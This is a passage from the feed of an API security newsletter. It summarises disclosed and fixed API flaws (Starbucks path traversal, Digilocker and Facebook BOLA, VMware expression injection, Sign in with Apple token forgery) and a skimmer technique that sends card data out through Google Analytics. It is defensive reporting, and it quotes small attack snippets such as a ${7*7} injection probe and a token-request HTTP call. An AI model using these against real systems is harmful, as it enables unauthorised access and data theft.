<p>Philippe De Ryck has made his course  <a href="https://courses.pragmaticwebsecurity.com/courses/introduction-to-oauth-2-0-and-openid-connect" target="_blank" rel="noopener noreferrer">&#8220;Introduction to OAuth 2.0 and OpenID Connect&#8221;</a> available online for free (registration required).</p>
<p>The curriculum of the course includes:</p>
<ul>
<li>OAuth2.0 and OIDC concepts</li>
<li>Using OAuth 2.0 with backend web clients</li>
<li>Introduction to OIDC</li>
<li>Mobile and native clients</li>
<li>Frontend web clients</li>
<li>Additional flows</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-91-homograph-oauth-bypass-common-jwt-mistakes-redos-attacks/">Issue 91: Homograph OAuth bypass, common JWT mistakes, ReDos attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 90: Twitter API data security incident, Google Analytics APIs used with skimmers</title>
		<link>https://apisecurity.io/issue-90-twitter-api-data-security-incident-google-analytics-apis-used-with-skimmers/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 01 Jul 2020 22:00:11 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7013</guid>

					<description><![CDATA[<p>This week, we take a look at how Twitter API erroneously allowed browsers to cache sensitive data, and how skimmers have found a way to use Google Analytics APIs to get their hands on credit card data. Plus, there is a live demo of API hacking, as well as a new book on API security. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-90-twitter-api-data-security-incident-google-analytics-apis-used-with-skimmers/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-90-twitter-api-data-security-incident-google-analytics-apis-used-with-skimmers/">Issue 90: Twitter API data security incident, Google Analytics APIs used with skimmers</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at how Twitter API erroneously allowed browsers to cache sensitive data, and how skimmers have found a way to use Google Analytics APIs to get their hands on credit card data. Plus, there is a live demo of API hacking, as well as a new book on API security.</p>
<h2>Vulnerability: Twitter</h2>
<p>HTTP headers can play an important role in API security, like <a href="https://www.bleepingcomputer.com/news/security/twitter-discloses-billing-info-leak-after-data-security-incident/" target="_blank" rel="noopener noreferrer">the case with Twitter API</a> shows. The header  <code>cache-control:no-store</code>  had not been set on the API, which meant that the data that this API returned to the web page was stored in the browser cache.</p>
<p>Unfortunately, this particular API was for Twitter&#8217;s advertisers&#8217; portal <code>ads.twitter.com</code> and their <code>analytics.twitter.com</code> site, and the returned data did include sensitive billing information. The flaw could not be exploited remotely, but someone with a physical access to the computer a user used could gain access to the information, meaning that Twitter still had to classify this as a Data Security Incident.</p>
<p>Twitter has since fixed this vulnerability.</p>
<h2>Attack vector: Google Analytics APIs</h2>
<p>Attackers use skimmers on e-commerce sites to inject their code (for example, JavaScript) to intercept credit card information on purchases. This is the first leg of the journey: attackers still need a way to ship that stolen data to their servers, and lots of sites are using Content Security Policy (CSP) to prevent that. With CSP, site owners effectively prohibit any API calls outside of their own. Sounds good, right?</p>
<p>Unfortunately, <a href="https://www.perimeterx.com/tech-blog/2020/bypassing-csp-exflitrate-data/" target="_blank" rel="noopener noreferrer">as Amir Shaked from PerimeterX demonstrates</a>, CSP is not really compatible with Google Analytics APIs. Google Analytics is widely used on websites to gather statistics and data for business decisions, and thus its domain is typically placed in the allowlist of the CSP.</p>
<p>In a way, this opens a backdoor (or open window, as Shaked puts it) to CSP. All attackers need to do to get that stolen data from the skimmer is to just call Google Analytics APIs and ship the data to <em>their</em> Google Analytics account. The domain of this call is identical to any other Google Analytics call, only the tag parameter is different. This it not enough for CSP to use as a discriminator, so the call sails through no problem.</p>
<p>This is a cautionary tale to keep in mind whenever a multitenant 3rd-party API is in use.</p>
<h2>Book: API Security in Action</h2>
<p><img loading="lazy" decoding="async" class="wp-image-7014 alignleft" src="https://apisecurity.io/wp-content/uploads/2020/07/API-Security-in-Action-book-cover.jpg" alt="" width="191" height="252" />Neil Madden has just finished his book <a href="https://www.manning.com/books/api-security-in-action" target="_blank" rel="noopener noreferrer">&#8220;API Security in Action&#8221;</a>, published by Manning. This was one of the books in their early access program (MEAP) that allowed readers to get it chapter by chapter as released by the author. Now you can get full content, and pre-order your hard-copy if you want.</p>
<p>Here&#8217;s the quick abstract of the book:</p>
<blockquote><p><em>&#8220;API Security in Action shows you how to create secure web APIs that you can confidently share with your business partners and expose for public usage. Security expert Neil Madden takes you under the hood of moder</em><em>n API security concepts, including token-based authentication for flexible multi-user security, bootstrapping a secure environment in a Kubernetes microservices architecture, and using lightweight cryptography to secure an IoT device.&#8221;</em></p></blockquote>
<p>Madden goes into great detail about different authentication mechanisms used in REST APIs and also covers modern API-based architectures, including microservice and IoT deployments.</p>
<p>As a cherry on top, you can get 42% off the list price when you use the coupon code <strong>42Crunch40</strong> at checkout!</p>
<h2>Video: API Hacking Demo</h2>
<p>Live, practical demos are always exciting. Katie Paxton-Fear has posted a recording of her live API Hacking Demo that is definitely worth checking out.</p>
<p>In her demo, she uses Burp to discover APIs on a server, enumerates paths, discovers <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">IDOR/BOLA</a> vulnerabilities, takes over an account, and concludes by escalating her privileges.</p>
<p>To provide practical examples, Paxton-Fear also shows what these bugs look like in her sample application code.</p>
<p><iframe loading="lazy" title="Live API Hacking Demo" width="640" height="360" src="https://www.youtube.com/embed/cWSu2Ja65Z4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-90-twitter-api-data-security-incident-google-analytics-apis-used-with-skimmers/">Issue 90: Twitter API data security incident, Google Analytics APIs used with skimmers</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 89: Starbucks API flaw exposes almost 100 million customer accounts</title>
		<link>https://apisecurity.io/issue-89-starbucks-api-flaw-exposes-almost-100-mln-customer-accounts/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 24 Jun 2020 22:00:05 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7001</guid>

					<description><![CDATA[<p>This week, we have the recent API vulnerabilities at Starbucks and in Drupal, a set of open-source tools by the Spanish bank Banco Bilbao Vizcaya Argentaria (BBVA), and extensions to Microsoft platform for integrating API security throughout it all. Vulnerability: Starbucks Sam Curry found an API vulnerability at Starbucks that exposed almost 100 million customer [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-89-starbucks-api-flaw-exposes-almost-100-mln-customer-accounts/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-89-starbucks-api-flaw-exposes-almost-100-mln-customer-accounts/">Issue 89: Starbucks API flaw exposes almost 100 million customer accounts</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have the recent API vulnerabilities at Starbucks and in Drupal, a set of open-source tools by the Spanish bank Banco Bilbao Vizcaya Argentaria (BBVA), and extensions to Microsoft platform for integrating API security throughout it all.</p>
<h2>Vulnerability: Starbucks</h2>
<p><a href="https://samcurry.net/hacking-starbucks/" target="_blank" rel="noopener noreferrer">Sam Curry found an API vulnerability at Starbucks</a> that exposed almost 100 million customer records. In his detailed write-up, Curry walks us through how he went about finding the issue:</p>
<ol>
<li>He found that the web page for buying gift cards used a REST API behind the scenes.</li>
<li>He noticed that the API was actually acting as a proxy and routing calls to internal backend APIs.</li>
<li>He found a combination of <code>\..</code> and <code>\.</code> segments that fooled the web application firewall (WAF) rules and allowed him to traverse API paths.</li>
<li>He and Justin Gardner then used Burp Intruder and a dictionary list to discover the available endpoints.</li>
<li>He located <code>/search/v1/accounts</code>,  a Microsoft Graph endpoint that gave him access to the records of almost 100 million Starbucks customers.</li>
</ol>
<p>Starbucks has already fixed this vulnerability. Curry&#8217;s entertaining post provides not only the details of the vulnerability itself, but also a brilliant account on how a researcher approaches finding one.</p>
<h2>Vulnerability: Drupal</h2>
<p><a href="https://www.drupal.org/sa-core-2020-004" target="_blank" rel="noopener noreferrer">Drupal has just fixed a Cross Site Request Forgery (CSRF) vulnerability in one of its Forms APIs</a> . The vulnerability was found by internal Drupal team members so the details are scant:</p>
<blockquote><p><em>The Drupal core Form API does not properly handle certain form input from cross-site requests, which can lead to other vulnerabilities.</em></p></blockquote>
<p>If you need a refresher on CSRF itself, check out this video by Tom Scott:</p>
<p><iframe loading="lazy" title="Cross Site Request Forgery - Computerphile" width="640" height="360" src="https://www.youtube.com/embed/vRBihr41JTo?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Tools: BBVA APICheck</h2>
<p>The Spanish bank BBVA has Innovation Security Labs team which maintains a set of open-source API Security tools called <a href="https://github.com/BBVA/apicheck" target="_blank" rel="noopener noreferrer">APICheck</a>.</p>
<p>The toolset includes, for example:</p>
<ul>
<li>Replay HTTP requests</li>
<li><code>acurl</code></li>
<li>APICheck proxy</li>
<li>JWT token validator (just released)</li>
<li>Sensitive data detector</li>
<li>Send data to a proxy server</li>
</ul>
<p>For more details on the toolset, check out its <a href="https://bbva.github.io/apicheck/" target="_blank" rel="noopener noreferrer">documentation</a>.</p>
<h2>Tools: API security extensions for VS Code, Azure DevOps, Azure Kubernetes Services</h2>
<p><a href="https://channel9.msdn.com/Shows/DevOps-Lab/API-Security-with-42Crunch" target="_blank" rel="noopener noreferrer">Microsoft Channel 9 has posted a video</a> of Abel Wang and Dmitry Sotnikov (me :)) talking about API security within the whole Microsoft platform. We cover different API security scenarios and show hands-on demos of the API security extensions for:</p>
<ul>
<li>Visual Studio Code (VS Code)</li>
<li>Azure DevOps pipelines (Azure Pipelines)</li>
<li>Azure Kubernetes Service (AKS)</li>
</ul>
<p><iframe loading="lazy" title="API Security with 42Crunch" width="640" height="360" src="https://www.youtube.com/embed/arSmDS0SVFw?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-89-starbucks-api-flaw-exposes-almost-100-mln-customer-accounts/">Issue 89: Starbucks API flaw exposes almost 100 million customer accounts</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 88: JWT pentesting, API discovery, the present and future of OpenAPI</title>
		<link>https://apisecurity.io/issue-88-jwt-pentesting-api-discovery-present-future-openapi/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 17 Jun 2020 22:00:49 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6987</guid>

					<description><![CDATA[<p>This week, we take a break from vulnerabilities and direct our gaze to the wider landscape of API security. On the practical side, we have a toolkit for JSON Web Token (JWT) security. The more high-level items include a video on API discovery, an eBook on API security, and a discussion on the role of [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-88-jwt-pentesting-api-discovery-present-future-openapi/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-88-jwt-pentesting-api-discovery-present-future-openapi/">Issue 88: JWT pentesting, API discovery, the present and future of OpenAPI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a break from vulnerabilities and direct our gaze to the wider landscape of API security.</p>
<p>On the practical side, we have a toolkit for JSON Web Token (JWT) security. The more high-level items include a video on API discovery, an eBook on API security, and a discussion on the role of the OpenAPI standard in API security.</p>
<h2>Tool: JWT toolkit</h2>
<p>With modern APIs, JWTs are the most commonly used security tokens. This means that JWT security serves as the cornerstone of REST API security in general (check out the JWT security videos that we posted in <a href="https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/" target="_blank" rel="noopener noreferrer">issue 72</a>).</p>
<p>Now there are two more open-source resources available:</p>
<ul>
<li><a href="https://github.com/ticarpi/jwt_tool" target="_blank" rel="noopener noreferrer">The JSON Web Token Toolkit</a>: a Python script <code>jwt-tool</code> for validating, forging and cracking JWTs.</li>
<li><a href="https://github.com/ticarpi/jwt_tool/wiki" target="_blank" rel="noopener noreferrer">JWT Attack Playbook</a>: A wiki on what JWTs are, how they work, how to test them for vulnerabilities, and common weaknesses and unintended coding errors with them. The wiki is closely related to the <code>jwt_tool</code>.</li>
</ul>
<h2>Video: Automated Web Application &amp; API Discovery &amp; Other Things That Sound Simple</h2>
<p>This is a recording of a presentation that Jeremy Brooks and Stuart Lane from Aaron&#8217;s Inc. held in the BSides Atlanta 2020.</p>
<p>Brooks and Lane talk about their experiences in locating shadow APIs in their network:</p>
<ul>
<li>Using DNS enumeration</li>
<li>Web host discovery</li>
<li>API discovery</li>
<li>Risk factor identification</li>
</ul>
<p><iframe loading="lazy" title="BSidesATL 2020 - Detect: Automated Web Application &amp; API Discovery &amp; Other Things That Sound Simple" width="640" height="480" src="https://www.youtube.com/embed/XfdrmRY7Kqk?start=321&#038;feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>eBook: Understanding API Security</h2>
<p>Manning has published a free eBook &#8220;<a href="https://42crunch.manning.com/" target="_blank" rel="noopener noreferrer">Understanding API Security</a>&#8221; by Justin Richer and Antonio Sanso.</p>
<p>Quoting the book abstract:</p>
<blockquote><p><em>&#8220;Gone are the days when it was acceptable for a piece of software to live in its own little silo, disconnected from the outside world. Today, services are expected to be available for programming, mixing, and building into new applications.</em></p>
<p class="mb-5"><em>Understanding API Security is a selection of chapters from several Manning books that give you some context for how API security works in the real world by showing how APIs are put together and how the OAuth protocol can be used to protect them.&#8221;</em></p>
</blockquote>
<p><a href="https://42crunch.manning.com/"><img loading="lazy" decoding="async" class="" src="https://42crunch.manning.com/images/cover.jpg" width="234" height="294" /></a></p>
<h2>Opinion: API security and the OpenAPI Specification standard</h2>
<p><a href="https://thenewstack.io/why-api-security-is-different-and-how-the-openapi-spec-can-help/" target="_blank" rel="noopener noreferrer">The New Stack has posted a conversation on API security</a> between Jesse Casman and Dmitry Sotnikov (that&#8217;s me :)) on the OpenAPI Specification (OAS) and API security. We discuss a bunch of topics including:</p>
<ul>
<li>What makes API security different from web app security</li>
<li>The role of standards and OpenAPI Initiative (OAI)</li>
<li>Gaps in standards</li>
<li>Top 3 API vulnerabilities</li>
<li>The future of API security</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-88-jwt-pentesting-api-discovery-present-future-openapi/">Issue 88: JWT pentesting, API discovery, the present and future of OpenAPI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 87: Vulnerabilities in Digilocker, Facebook, VMware Cloud Director</title>
		<link>https://apisecurity.io/issue-87-vulnerabilities-digilocker-facebook-vmware-cloud-director/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 10 Jun 2020 22:00:56 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6959</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerabilities in Digilocker, Facebook, and VMware Cloud Director. On top of that trio, there is also a new instructive video on REST API pentesting. Vulnerability: Digilocker A critical API vulnerability in India&#8217;s digital wallet system, Digilocker, exposed personal documents of more than 38 million citizens. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-87-vulnerabilities-digilocker-facebook-vmware-cloud-director/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-87-vulnerabilities-digilocker-facebook-vmware-cloud-director/">Issue 87: Vulnerabilities in Digilocker, Facebook, VMware Cloud Director</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerabilities in Digilocker, Facebook, and VMware Cloud Director. On top of that trio, there is also a new instructive video on REST API pentesting.</p>
<h2>Vulnerability: Digilocker</h2>
<p>A critical API vulnerability in India&#8217;s digital wallet system, Digilocker, exposed personal documents of more than 38 million citizens. This app lets you store your key documents, such as driver&#8217;s license and national identity card, in digital format instead of carrying the physical documents with you. <a href="https://medium.com/@Volatile_Life/how-i-got-access-to-38m-digilocker-accounts-a11d7aa770f7" target="_blank" rel="noopener noreferrer">Ashish Gahlot</a> and <a href="https://yetanothersec.com/blog/2020/06/03/digilocker-disclosure/" target="_blank" rel="noopener noreferrer">Mohesh Mohan</a> have both reported this issue independently of one another.</p>
<p>Both the mobile and the web app of Digilocker use APIs to communicate with the backend. As it often happens with REST APIs, one can find a vulnerability by invoking them in a different sequence  than the intended one.</p>
<p>To protect access, the system was meant to send a one-time password (OTP) to the phone number associated with the record and require users to provide their 6-digit personal identification number (PIN). However, Mohan and Gahlot could break into the system by first completing the OTP and logging in with a valid account, but then calling <code>POST /signup/set_pin</code> for a <em>different </em>account. The backend did not verify that the identities match and allowed to reset the PIN and access the documents of the other user.</p>
<p>The vulnerability was swiftly fixed after it was reported. Lessons learned here:</p>
<ul>
<li>Do not rely on your web or mobile UI as the security edge and the surface to enforce scenarios. Attackers will invoke your APIs directly in any sequence they want.</li>
<li>Authorization is key. You cannot trust the parameters of API calls.</li>
<li>Any OTP, PIN, or password reset API calls should be treated as high security, at the level of scrutiny that you would apply to authentication.</li>
</ul>
<p>You can read more about BOLA/IDOR vulnerabilities in the <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object level authorization</a> API security encyclopedia article.</p>
<h2>Vulnerability: Facebook</h2>
<p><a href="https://blog.darabi.me/2020/06/image-removal-vulnerability-on-facebook.html" target="_blank" rel="noopener noreferrer">Facebook has fixed a broken object level authorization (BOLA, also known as IDOR) API vulnerability</a> that Pouya Darabi reported.  The vulnerability allowed attackers to delete any image from any user&#8217;s profile.</p>
<p>The culprit here was the recently added Series feature in Facebook for Business (not in the common Facebook) that lets you group your images and videos together. If you delete your Series, all content in it is also deleted from Facebook.</p>
<p>On Facebook Creator Studio UI, you can only add content that you own in your Series. However, if you bypassed the UI and called the API behind it directly, you could add images that belonged to other users simply by supplying the object ID of the image as a parameter in the API call.</p>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-6960" src="https://apisecurity.io/wp-content/uploads/2020/06/Add-image-to-Facebook-Series.jpg" alt="" width="2266" height="779" /></p>
<p>Thus, to delete someone else&#8217;s images, attackers only had to make an API call to add the image to their Series and then delete the Series.</p>
<p>Although at first the case looks very different from the Digilocker above, the similarities in the lessons here are obvious:</p>
<ul>
<li>Do not trust the UI to enforce security, attackers just bypass it and go directly for your APIs.</li>
<li>You cannot trust any ID parameters supplied in API calls. Or any parameters, for that matter.</li>
<li>Authorization needs to be checked on all calls.</li>
<li>Even non-sensitive calls need to be handled with caution because they might become part of scenario that has sensitive operations down the line. Expect there will be human error down the line as your API continues to be developed, and plan for it in advance.</li>
</ul>
<p>This is not the first time Facebook has API vulnerabilities related to photos. We have covered a previous case, for example, in our <a href="https://apisecurity.io/issue-46-cisco-and-facebook-patch-apis-solr-api-parameter-injection/" target="_blank" rel="noopener noreferrer">issue 46</a>.</p>
<h2>Vulnerability: VMware Cloud Director</h2>
<p>VMware has just fixed <a href="https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/" target="_blank" rel="noopener noreferrer">a code injection vulnerability in their Cloud Director product</a> that allowed unauthorized administrative access.</p>
<p>Researchers from Citadelo experimented with trying different values for different parameters. They noticed that when they supplied <code>${7*7}</code> as the SMTP server name (obviously not a valid name for a server), the received error response said: <code>String <span class="hljs-keyword">value</span> has invalid format, <span class="hljs-keyword">value</span>: [<span class="hljs-number">49</span>]</code>.</p>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-6961" src="https://apisecurity.io/wp-content/uploads/2020/06/el-injection.png" alt="" width="1920" height="726" /></p>
<p>The fact that the error said <code>49</code>, <em>not</em> <code>${7*7}</code> that the researchers had submitted, was an indicator that the backend had a code injection problem. They could then exploit this vulnerability by supplying various Java expressions, accessing various Java classes, and eventually getting full system access.</p>
<p>This is serious because a lot of service providers use VMware Cloud Director, meaning that attackers could get administrative access to a system hosting multiple customers, racking up the impact significantly.</p>
<p>Lessons learned in this one:</p>
<ul>
<li>API inputs cannot be trusted (<em>didn&#8217;t we say this already?</em>).</li>
<li>Any parameter and API payload schema needs to be strictly defined (type, limits, regular expressions) and enforced.</li>
<li>Responses are important, too. They might reveal details that attackers can use in further attacks, as seen here so vividly.</li>
</ul>
<h2>Video: How to do recon: API enumeration</h2>
<p>In her latest video, Katie Paxton-Fear demonstrates REST API enumeration/recon, and finding endpoints, hidden parameters, and bugs. The demos include Burp, Ffuf, and Arjun. Check it out:</p>
<p><iframe loading="lazy" title="How To Do Recon: API Enumeration" width="640" height="360" src="https://www.youtube.com/embed/fvcKwUS4PTE?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>And if you have not seen Katie&#8217;s earlier video on API pentesting, check it out in our <a href="https://apisecurity.io/issue-83-indias-covid-19-tracing-app-oauth2-api-attacks/" target="_blank" rel="noopener noreferrer">issue 83</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-87-vulnerabilities-digilocker-facebook-vmware-cloud-director/">Issue 87: Vulnerabilities in Digilocker, Facebook, VMware Cloud Director</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 86: Vulnerabilities in Sign in with Apple, Qatar&#8217;s COVID19 app, GitLab</title>
		<link>https://apisecurity.io/issue-86-vulnerabilities-sign-apple-qatars-covid19-app-gitlab/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 03 Jun 2020 22:00:07 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6934</guid>

					<description><![CDATA[<p>This week, we have three API vulnerabilities in: Apple&#8217;s Sign in with Apple authentication endpoint Qatar&#8217;s COVID-19 tracking app GitLab&#8217;s Repository Files API In addition, there&#8217;s also a new Burp plugin that automatically handles authentication tokens in API calls. Vulnerability: Sign in with Apple Sign in with Apple is an OAuth-like social logon system from [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-86-vulnerabilities-sign-apple-qatars-covid19-app-gitlab/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-86-vulnerabilities-sign-apple-qatars-covid19-app-gitlab/">Issue 86: Vulnerabilities in Sign in with Apple, Qatar&#8217;s COVID19 app, GitLab</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have three API vulnerabilities in:</p>
<ul>
<li>Apple&#8217;s Sign in with Apple authentication endpoint</li>
<li>Qatar&#8217;s COVID-19 tracking app</li>
<li>GitLab&#8217;s Repository Files API</li>
</ul>
<p>In addition, there&#8217;s also a new Burp plugin that automatically handles authentication tokens in API calls.</p>
<h2>Vulnerability: Sign in with Apple</h2>
<p><em>Sign in with Apple</em> is an OAuth-like social logon system from Apple. It is widely used, and  in fact, Apple mandate the inclusion of Sign in with Apple in apps with other social-based login systems. Now, Bhavuk Jain has <a href="https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/" target="_blank" rel="noopener noreferrer">found a way to impersonate himself as any user</a> in it.</p>
<p>Just like other similar systems, Sign in with Apple authenticates a user and produces a signed JWT token. The user&#8217;s client then uses that token to access the site or app that the user wanted to sign in to. The app finds the information about the user from the token (JWT tokens are encoded signed JSON structures), and verifies that the token has been signed by Apple and thus can be trusted.</p>
<p>What makes Sign in with Apple special is that, for privacy reasons, users may request the system to <em>not</em> put their actual email address in the token. Instead, Apple generates a random ID that looks like <code>XXXXX@privaterelay.appleid.com</code>.</p>
<p>Jain found out that Apple had an open endpoint that allowed anyone to request a JWT token with an arbitrary email address in it using a simple API call:</p>
<pre class="line-numbers" data-start="1"><code class="language-http">POST /XXXX/XXXX HTTP/1.1
Host: appleid.apple.com

{"email":"contact@bhavukjain.com"}</code></pre>
<p>The received token was signed by Apple, and thus would be considered valid by many apps. However, the structure of the token was different than in regular tokens and lacked the important security-related fields, such as <code>sub</code>.</p>
<p>Apps that enforced the token format and checked all security-related fields on the JWT tokens that they received were thus not vulnerable to the attack. Unfortunately, those apps that simply checked the signature and then blindly relied on it could fall prey to attackers.</p>
<p>This vulnerability has been fixed now. However, it serves as another reminder that:</p>
<ul>
<li>Identity providers (and in fact any API providers) should only expose publicly the APIs that external clients need, and implement zero-trust approach to the data they receive.</li>
<li>Authentication consumers should make sure they implement all current JWT security best practices.</li>
</ul>
<p>For JWT security best practices, see <a href="https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/" target="_blank" rel="noopener noreferrer">the 3 conference talk recordings that we had in our issue 72</a>.</p>
<h2>Vulnerability: Qatar&#8217;s COVID-19 app</h2>
<p>The government of Qatar has mandated the use of their coronavirus contact tracing app, EHTERAZ, by all citizens. The app is compulsory, and those not using the app risk spending up to 3 years in prison and paying up to about $55,000 USD in fines.</p>
<p><a href="https://www.amnesty.org/en/latest/news/2020/05/qatar-covid19-contact-tracing-app-security-flaw/" target="_blank" rel="noopener noreferrer">Amnesty International Security Lab found glaring API security holes in the system</a>. The API behind the app was wide open and returned the name, health status, and location for any citizen. (It actually returns a generated QR code but the color of the code reflects the health status.)</p>
<p>The citizen IDs that were used as the parameter for the API call are sequential, so attackers could simply enumerate the whole population of the country to harvest sensitive personal information.</p>
<p>Luckily, the vulnerability was fixed quickly, and the API no longer leaks personal data. This is yet another example of why:</p>
<ul>
<li>Even internal APIs of your systems need to be thoroughly protected with both authentication and authorization.</li>
<li>ID parameters are a bad idea.</li>
<li>Sequential parameters that attackers can enumerate exacerbate security issues.</li>
</ul>
<h2>Vulnerability: GitLab</h2>
<p>GitLab has just fixed <a href="https://about.gitlab.com/releases/2020/05/27/security-release-13-0-1-released/" target="_blank" rel="noopener noreferrer">a cross-site scripting (XSS) vulnerability in their Repository Files API</a>. They have not provided much details on the vulnerability, except the following:</p>
<blockquote><p><em>Under certain conditions, requests involving the repository files API could result in an XSS vulnerability. This issue is now mitigated in the latest release and is waiting for a CVE ID to be assigned.</em></p></blockquote>
<p>If you are an API provider, make sure to always strictly define all schemas and enforce proper data validation to avoid similar vulnerabilities.</p>
<h2>Tools: Authentication Token Obtain and Replace (ATOR) plugin for Burp</h2>
<p>Ashwath Reddy and Manikandan Rajappan from Synopsys have made their Burp plugin <a href="https://medium.com/@kashwathkumar/authentication-token-obtain-and-replace-ator-burp-plugin-fast-and-reliable-plugin-to-handle-b19e3621c6a7" target="_blank" rel="noopener noreferrer">Authentication Token Obtain and Replace (ATOR)</a> open-source.</p>
<p>The plugin can automatically request authentication tokens for and insert them in API calls. This can be handy as it eliminates manual token handling during API security research.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-6935 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/06/ATOR-Burp-plugin.jpeg" alt="" width="901" height="568" /></p>
<p>There is also <a href="https://medium.com/@kashwathkumar/authentication-token-obtain-and-replace-ator-burp-plugin-fast-and-reliable-plugin-to-handle-1d9a0b3054e" target="_blank" rel="noopener noreferrer">the second part</a> of the series covering the tool. Is has info on multi-step login, multi-token replacement, and common regex patterns.</p>
<p>There is also ability to export and import configuration. Pretty helpful when used within CI/CD pipeline.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-86-vulnerabilities-sign-apple-qatars-covid19-app-gitlab/">Issue 86: Vulnerabilities in Sign in with Apple, Qatar&#8217;s COVID19 app, GitLab</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 85: Vulnerability in Google Cloud Deployment Manager, a pentester&#8217;s guide to OAuth</title>
		<link>https://apisecurity.io/issue-85-vulnerability-google-cloud-deployment-manager-pentesters-guide-oauth/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 27 May 2020 22:00:13 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6916</guid>

